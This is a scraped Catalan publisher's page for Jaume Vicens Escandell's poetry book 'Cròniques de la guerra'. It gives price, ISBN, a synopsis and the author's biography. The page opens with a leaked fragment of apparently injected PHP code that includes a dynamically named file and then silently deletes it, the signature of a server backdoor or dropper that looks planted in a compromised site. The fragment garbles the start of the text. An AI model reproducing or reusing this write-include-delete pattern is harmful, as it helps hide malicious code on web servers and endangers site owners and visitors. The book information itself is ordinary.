");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Cròniques de la guerra
Cercador d'Obres
ORDENAR:
Començar recerca

Cròniques de la guerra

Vicens Escandell, Jaume

Prologuista:
Antoni Serra
Col·lecció:
Magatzem Can Toni
Tema:
Poesia
Pàgines:
88
PVP:
12.00
ISBN:
978-84-16163-27-4
Data d'Edició:
23/03/2015
Poesia reflexiva i crítica, amb un gran contingut estètic.
Sinopsi
La poesia serà moral si és autèntica. I quan és que la poesia és autèntica? Doncs quan és capaç de dir coses, d’expressar-les de tal manera que el poeta, i el lector, no havien imaginat. La poesia és autèntica quan causa sorpresa. (Jaume Vicens.)


Llegiu la Taula
Jaume Vicens Escandell
(Palma, 1956), és un jubilat per Mallorca i membre de la junta directiva de l’associació Jubilats per Mallorca. Ha publicat tres llibres de poemes: Dècada primera, Poemes negres, Propagació de l’estiu, Salutació a Cioran i Cròniques de la guerra. Ha guanyat el premi de poesia Vall d’Or, convocat per l’Ajuntament de Sóller i el premi de poesia Castellitx, convocat per l’Ajuntament d’Algaida. També ha publicat narrativa en la revista valenciana L’Aljamia i ha col·laborat amb la revista de divulgació cultural S’Esclop. En 2009 i 2010 va ser el coordinador del butlletí informatiu L’Estaló, editat a Calvià, i ha col·laborat en diverses publicacions, tant d’aquest municipi com en altres revistes editades per l’Associació de la Premsa Forana de Mallorca.
Recomanar
Comentar
Comentaris (0)